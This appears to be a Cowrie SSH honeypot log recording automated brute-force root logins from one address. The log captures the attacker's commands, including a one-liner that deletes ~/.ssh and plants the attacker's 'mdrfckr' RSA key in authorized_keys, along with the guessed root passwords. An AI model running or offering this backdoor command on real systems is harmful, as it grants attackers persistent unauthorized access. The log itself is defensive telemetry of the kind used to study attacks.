{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:35:03.479098Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:35:03.710060Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.login.success","username":"root","password":"Gfhjkm12","message":"login attempt [root/Gfhjkm12] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:35:04.672217Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:35:05.149337Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:35:05.150054Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:35:05.150961Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:35:05.382391Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:35:05.904716Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:35:05.905530Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:35:06.138718Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:35:06.139587Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35440,"dst_ip":"1.2.3.4","dst_port":22,"session":"6326b15d0a6e","protocol":"ssh","message":"New connection: 212.227.235.229:35440 (1.2.3.4:22) [session: 6326b15d0a6e]","sensor":"my-vps","timestamp":"2025-08-28T10:35:06.367223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:35:06.368244Z","src_ip":"212.227.235.229","session":"6326b15d0a6e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:35:06.597306Z","src_ip":"212.227.235.229","session":"6326b15d0a6e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:35:07.555141Z","src_ip":"212.227.235.229","session":"6326b15d0a6e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:35:08.787457Z","src_ip":"212.227.235.229","session":"6326b15d0a6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35454,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86002676ebf","protocol":"ssh","message":"New connection: 212.227.235.229:35454 (1.2.3.4:22) [session: f86002676ebf]","sensor":"my-vps","timestamp":"2025-08-28T10:35:09.015748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:35:09.016734Z","src_ip":"212.227.235.229","session":"f86002676ebf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:35:09.245728Z","src_ip":"212.227.235.229","session":"f86002676ebf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:35:10.205923Z","src_ip":"212.227.235.229","session":"f86002676ebf"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:35:10.436336Z","src_ip":"212.227.235.229","session":"6328efb12ca4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:35:10.437433Z","src_ip":"212.227.235.229","session":"f86002676ebf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48580,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba705cb18b6b","protocol":"ssh","message":"New connection: 212.227.235.229:48580 (1.2.3.4:22) [session: ba705cb18b6b]","sensor":"my-vps","timestamp":"2025-08-28T10:35:37.896073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:35:37.897708Z","src_ip":"212.227.235.229","session":"ba705cb18b6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:35:38.155092Z","src_ip":"212.227.235.229","session":"ba705cb18b6b"}
{"eventid":"cowrie.login.success","username":"root","password":"535897","message":"login attempt [root/535897] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:35:39.199538Z","src_ip":"212.227.235.229","session":"ba705cb18b6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45176,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60f32ffad9f","protocol":"ssh","message":"New connection: 212.227.235.229:45176 (1.2.3.4:22) [session: c60f32ffad9f]","sensor":"my-vps","timestamp":"2025-08-28T10:35:58.985457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:35:58.989433Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:35:59.287262Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Password$1","message":"login attempt [root/Password$1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:36:00.468360Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:36:01.080332Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:36:01.081232Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T10:36:01.082057Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:01.383594Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:36:02.037709Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.038646Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.341856Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.342970Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46018,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa8b7867ccc8","protocol":"ssh","message":"New connection: 212.227.235.229:46018 (1.2.3.4:22) [session: fa8b7867ccc8]","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.617463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.625805Z","src_ip":"212.227.235.229","session":"fa8b7867ccc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:36:02.903895Z","src_ip":"212.227.235.229","session":"fa8b7867ccc8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T10:36:04.025824Z","src_ip":"212.227.235.229","session":"fa8b7867ccc8"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:05.307978Z","src_ip":"212.227.235.229","session":"fa8b7867ccc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46672,"dst_ip":"1.2.3.4","dst_port":22,"session":"57ed4e1833d9","protocol":"ssh","message":"New connection: 212.227.235.229:46672 (1.2.3.4:22) [session: 57ed4e1833d9]","sensor":"my-vps","timestamp":"2025-08-28T10:36:05.586299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:36:05.587328Z","src_ip":"212.227.235.229","session":"57ed4e1833d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:36:05.865891Z","src_ip":"212.227.235.229","session":"57ed4e1833d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:36:07.034404Z","src_ip":"212.227.235.229","session":"57ed4e1833d9"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:07.314926Z","src_ip":"212.227.235.229","session":"c60f32ffad9f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:36:07.315778Z","src_ip":"212.227.235.229","session":"57ed4e1833d9"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":40734,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8814181ca7c","protocol":"ssh","message":"New connection: 77.90.185.47:40734 (1.2.3.4:22) [session: a8814181ca7c]","sensor":"my-vps","timestamp":"2025-08-28T10:36:41.054000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:36:41.216637Z","src_ip":"77.90.185.47","session":"a8814181ca7c"}
